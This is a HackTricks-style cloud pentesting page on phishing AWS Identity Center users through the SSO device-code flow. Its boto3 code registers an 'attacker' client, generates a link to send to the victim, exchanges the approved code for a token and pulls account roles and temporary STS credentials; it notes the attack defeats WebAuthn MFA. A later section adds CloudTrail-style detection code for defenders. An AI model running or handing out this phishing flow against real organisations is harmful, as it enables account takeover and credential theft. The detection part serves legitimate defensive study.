AWS - Identity Center & SSO Unauthenticated Enum
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
AWS Device Code Phishing
As originally presented in this blog post, it is possible to send a link to a user who uses AWS SSO such that, if the user accepts it, the attacker obtains a token to impersonate the user and can reach every role that user can access in Identity Center.
The preconditions for this attack are:
- The victim must be using Identity Center
- The attacker must know the subdomain the victim uses:
<victimsub>.awsapps.com/start
With only that information, the attacker can send the user a link which, if accepted, gives the attacker access to the user's AWS account.
Attack
- Finding the subdomain
The attacker's first step is to discover the subdomain the victim company uses for its Identity Center. This can be done through OSINT or by guessing and brute-forcing, since most companies use their name, or a variation of it, here.
With that information it is possible to obtain the region where Identity Center was configured:
    curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
    "region":"us-east-1"
- Generate the link for the victim & send it
Run the following code to generate an AWS SSO login link for the victim to authenticate with.
For the demo, run this code in a python console and don't close it, since later you'll need some of these objects to obtain the token:
    import boto3

    REGION = 'us-east-1'  # CHANGE THIS: region found in the previous step
    AWS_SSO_START_URL = 'https://victim.awsapps.com/start'  # CHANGE THIS: victim's start URL

    sso_oidc = boto3.client('sso-oidc', region_name=REGION)

    # Register a public OIDC client against the victim's Identity Center (no credentials needed)
    client = sso_oidc.register_client(
        clientName='attacker',
        clientType='public'
    )
    client_id = client.get('clientId')
    client_secret = client.get('clientSecret')

    # Start the device authorization flow; the returned URL is what the victim must open
    authz = sso_oidc.start_device_authorization(
        clientId=client_id,
        clientSecret=client_secret,
        startUrl=AWS_SSO_START_URL
    )
    url = authz.get('verificationUriComplete')
    deviceCode = authz.get('deviceCode')  # kept for the create_token call later
    print("Give this URL to the victim: " + url)
Send the generated link to the victim using your amazing social engineering skills!
- Wait until the victim accepts it
If the victim was already logged in to AWS, they only need to accept granting the permissions; if not, they will need to log in and then accept granting the permissions. This is what the prompt currently looks like:
- Get the SSO access token
If the victim accepted the prompt, run this code to generate an SSO token impersonating the user:
    # Exchange the device code for a token (raises AuthorizationPendingException until the victim approves)
    token_response = sso_oidc.create_token(
        clientId=client_id,
        clientSecret=client_secret,
        grantType="urn:ietf:params:oauth:grant-type:device_code",
        deviceCode=deviceCode
    )
    sso_token = token_response.get('accessToken')
The SSO access token is valid for 8h.
- Impersonate the user
    sso_client = boto3.client('sso', region_name=REGION)

    # List accounts where the user has access
    aws_accounts_response = sso_client.list_accounts(
        accessToken=sso_token,
        maxResults=100
    )
    accounts = aws_accounts_response.get('accountList', [])
    print(accounts)

    # Get roles inside an account (the first returned account is used as an example)
    account_id = accounts[0]['accountId']
    roles_response = sso_client.list_account_roles(
        accessToken=sso_token,
        accountId=account_id
    )
    roles = roles_response.get('roleList', [])
    print(roles)

    # Get temporary STS credentials for a role (the first returned role is used as an example)
    role_name = roles[0]['roleName']
    sts_creds = sso_client.get_role_credentials(
        accessToken=sso_token,
        roleName=role_name,
        accountId=account_id
    )
    print(sts_creds.get('roleCredentials'))
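From the defender's side, the three API calls in this flow (RegisterClient, StartDeviceAuthorization and CreateToken with the device_code grant) are all issued from the attacker's machine, while the victim only approves in a browser, so the source IP of that call chain is the most useful signal. The Python below is an added example for detection, not code from this page or from any of the listed tools: it groups constructed CloudTrail-style records by clientId and flags device-code token grants whose chain originated outside the organisation's trusted networks. The eventSource value `sso.amazonaws.com`, the contents of requestParameters/responseElements and every sample record are assumptions made for the example.

```python
import ipaddress
from collections import defaultdict

DEVICE_CODE_GRANT = "urn:ietf:params:oauth:grant-type:device_code"
FLOW_EVENTS = {"RegisterClient", "StartDeviceAuthorization", "CreateToken"}

# Constructed CloudTrail-style records (not real logs). Envelope fields such as
# eventName, sourceIPAddress and errorCode are CloudTrail's standard ones; the
# eventSource value and the parameter contents are assumptions for this example.
SAMPLE_EVENTS = [
    # Chain 1: a client registered from an unknown IP, then a device-code token grant.
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "sso.amazonaws.com",
     "eventName": "RegisterClient", "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"clientName": "attacker", "clientType": "public"},
     "responseElements": {"clientId": "client-abc"}},
    {"eventTime": "2024-05-01T10:00:05Z", "eventSource": "sso.amazonaws.com",
     "eventName": "StartDeviceAuthorization", "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"clientId": "client-abc",
                           "startUrl": "https://victim.awsapps.com/start"}},
    # Polling before the victim approves fails; such records carry an errorCode.
    {"eventTime": "2024-05-01T10:01:00Z", "eventSource": "sso.amazonaws.com",
     "eventName": "CreateToken", "sourceIPAddress": "203.0.113.10",
     "errorCode": "AuthorizationPendingException",
     "requestParameters": {"clientId": "client-abc", "grantType": DEVICE_CODE_GRANT}},
    {"eventTime": "2024-05-01T10:03:00Z", "eventSource": "sso.amazonaws.com",
     "eventName": "CreateToken", "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"clientId": "client-abc", "grantType": DEVICE_CODE_GRANT}},
    # Chain 2: a normal CLI login, entirely from the corporate network.
    {"eventTime": "2024-05-01T11:00:00Z", "eventSource": "sso.amazonaws.com",
     "eventName": "RegisterClient", "sourceIPAddress": "10.20.0.7",
     "requestParameters": {"clientName": "cli-laptop", "clientType": "public"},
     "responseElements": {"clientId": "client-cli"}},
    {"eventTime": "2024-05-01T11:00:02Z", "eventSource": "sso.amazonaws.com",
     "eventName": "StartDeviceAuthorization", "sourceIPAddress": "10.20.0.7",
     "requestParameters": {"clientId": "client-cli",
                           "startUrl": "https://victim.awsapps.com/start"}},
    {"eventTime": "2024-05-01T11:00:40Z", "eventSource": "sso.amazonaws.com",
     "eventName": "CreateToken", "sourceIPAddress": "10.20.0.7",
     "requestParameters": {"clientId": "client-cli", "grantType": DEVICE_CODE_GRANT}},
]


def _params(event):
    return event.get("requestParameters") or {}


def _client_id(event):
    # RegisterClient returns the clientId; the later calls send it as a parameter.
    return _params(event).get("clientId") or (event.get("responseElements") or {}).get("clientId")


def find_suspicious_device_code_grants(events, trusted_cidrs):
    """Return one alert per clientId whose device-code flow touched an untrusted IP."""
    trusted = [ipaddress.ip_network(c) for c in trusted_cidrs]
    chains = defaultdict(list)
    for ev in events:
        if ev.get("eventName") not in FLOW_EVENTS or ev.get("errorCode"):
            continue  # ignore unrelated events and failed (pending) polls
        cid = _client_id(ev)
        if cid:
            chains[cid].append(ev)

    alerts = []
    for cid, evs in chains.items():
        grants = [e for e in evs if e["eventName"] == "CreateToken"
                  and _params(e).get("grantType") == DEVICE_CODE_GRANT]
        if not grants:
            continue  # only successful device-code grants are interesting here
        ips = sorted({e["sourceIPAddress"] for e in evs})
        untrusted = [ip for ip in ips
                     if not any(ipaddress.ip_address(ip) in net for net in trusted)]
        if untrusted:
            reg = next((e for e in evs if e["eventName"] == "RegisterClient"), {})
            alerts.append({
                "clientId": cid,
                "clientName": _params(reg).get("clientName"),
                "untrustedIps": untrusted,
                "tokenIssuedAt": grants[-1]["eventTime"],
            })
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_device_code_grants(SAMPLE_EVENTS, ["10.0.0.0/8"]):
        print("device-code grant from outside trusted networks:", alert)
```

The trusted-network list is the only tuning knob: developer laptops that log in through the CLI from the corporate network or VPN fall inside it, so the benign chain above produces nothing, while a chain whose RegisterClient/CreateToken calls come from an address the organisation does not own is exactly the shape of the flow described on this page. Pairing this with a review of unfamiliar clientName values gives an analyst enough context to revoke the session within the token's 8h lifetime.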
Phishing the unphishable MFA
It is interesting to note that the previous attack works even when an "unphishable MFA" (WebAuthn) is in use. This is because the workflow above never leaves the legitimate OAuth domain. Unlike other phishing, where the user has to log in on a different domain, the device code workflow is designed so that a code is known to one device while the user may log in from a different machine entirely. If the user accepts the prompt, the device that knows the original code is able to obtain the user's credentials.
For more information about this, check this post.
Automatic Tools
- https://github.com/christophetd/aws-sso-device-code-authentication
- https://github.com/sebastian-mora/awsssome_phish
References
- https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/
- https://ruse.tech/blogs/aws-sso-phishing
- https://mjg59.dreamwidth.org/62175.html
- https://ramimac.me/aws-device-auth